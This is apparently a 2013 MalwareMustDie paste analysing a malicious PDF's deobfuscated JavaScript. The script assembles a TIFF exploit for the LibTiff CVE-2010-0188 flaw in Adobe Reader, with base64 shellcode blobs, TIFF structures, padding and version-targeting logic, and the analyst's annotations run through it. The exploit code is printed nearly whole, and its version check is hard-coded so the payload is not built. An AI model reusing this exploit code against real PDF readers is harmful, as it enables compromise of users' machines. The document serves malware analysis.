
#MalwareMustDie - Suspected PDF 0day (new) w/ detected LibTiff

MalwareMustDie Jan 23rd, 2013 276 Never
  1. // MalwareMustDie - suspected 0day analysis...
  2. // after some obfuscations, ending up to the below values..
  3. // can't get the value of fkyhifxmy() yet...
  4.  
  5.  
  6.  
  7. // another onfuscation data in here...
  8. //
  9. edlejemod = "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";
  10.  
  /**
   * Grows the string o by repeated self-concatenation until it is at least
   * k characters long, then returns its first k characters.
   * Used below as a padding generator: tblefdr(unit, n) yields n characters
   * made of the unit repeated. Note: an empty o with k > 0 never grows, so
   * the loop would not terminate in that case (same as the original).
   */
  function tblefdr(o, k){
    var buf = o;
    for (; buf.length < k; buf += buf) {
      // doubling until long enough
    }
    return buf.substring(0, k);
  }
  17.  
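  // Entry point of the script: everything else in the listing is reached from
  // this call. The declaration of fkyhifxmy() appears further down; function
  // declarations are hoisted, so calling it here is valid.
  // (The analyst's "<== the main" marker was bare text, not valid JS, and is
  //  kept as a comment.)
  fkyhifxmy(); // <== the main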
  19.              
  /**
   * Assembles the malicious document in memory and stores it in
   * esrmhkwko.rawValue. esrmhkwko is not defined anywhere in this listing
   * (presumably an XFA form field object — unverified from here).
   *
   * Analyst reading, grounded in the code below:
   *  - the only gate is a viewer version number from rvcorgs(): the payload is
   *    built only when that value is >= 8000, and one of two version-specific
   *    blobs is chosen at the 8201 boundary;
   *  - with the hard-coded version 5110 in rvcorgs() the gate is never passed,
   *    which is why this function "won't burp a value": esrmhkwko.rawValue is
   *    never assigned in that configuration;
   *  - the function returns undefined on every path.
   */
  function fkyhifxmy(){       // PoC of Libtiff integer overflow in Adobe Reader and
                              // Acrobat CVE-2010-0188 is detected here...

    // Two version-specific payload blobs (base64). Only one of them is appended
    // to the document, selected by the version comparison near the end.
    hboxwhkju = "o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAABReASiBWhEoPY4BKo+uASjAggkqvWIBKXVyASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQUXgEpqaVmNEE2BSgUXgEp0JASNMFOBSgUXgEpBQUFBeAzzpEtTgUoCF4BKQUFBQTHJZItxMIt2DIt2HItuCItGIIs2ZjlIGHXyi0U8i1QFeAHqi3IgAe4xyUGtAeiLGCtYBIH75SDd/3XvSYtaJAHrZosMS4taHAHrAyyLieZqBP82/9WFwK119YE4SUkqAHXtljHJtQPzpQ==";
    neeynlkdi = "kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol";
    // Document prefix: "SUkqAA" base64-decodes to "II*\0", the little-endian
    // TIFF magic — consistent with the LibTIFF CVE named above.
    lfwfnldsc = "SUkqADggAACQ";
    // Short base64 unit that tblefdr() repeats to produce the two padding runs below.
    eosjddjas = "kJCQ";
    // Trailing structure appended after the padding, before the chosen blob.
    vbnqhwdkk = "kAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////";
      // Version probe. The original read app.viewerVersion (kept as comments);
      // the analyst replaced it with a fixed value. Returns parseInt(5110, 10) == 5110.
      function rvcorgs(){
      // mm = app.viewerVersion.toString(); // bypass this mm bullshit...
      // mm = mm.replace(".", "");
      // while (mm.length < 4){
      //  mm += 0
      //}
      mm = 5110;
      ll = 10;
      return parseInt(mm, ll)
    }
    pxhnxcedi = rvcorgs();            // suspected parts..
    // Gate on viewer version. With the hard-coded 5110 this is false and the
    // whole assembly is skipped; to observe the payload being built, the probe
    // would have to return a value in the targeted range (>= 8000).
    if (pxhnxcedi >= 8000){
      gjoegkdqt = lfwfnldsc;
      gjoegkdqt += tblefdr(eosjddjas, 2000);
      gjoegkdqt += edlejemod;                   // while feeding obfs data...
      gjoegkdqt += tblefdr(eosjddjas, 7736);
      gjoegkdqt += vbnqhwdkk;
      // Second version split: < 8201 gets the first blob, otherwise the second.
      gjoegkdqt += (pxhnxcedi < 8201 ? hboxwhkju : neeynlkdi);
      // Only side effect of the function; target object not defined in this listing.
      esrmhkwko.rawValue = gjoegkdqt
    }
    return   // won't burp a value.. must debug further in memory..
  }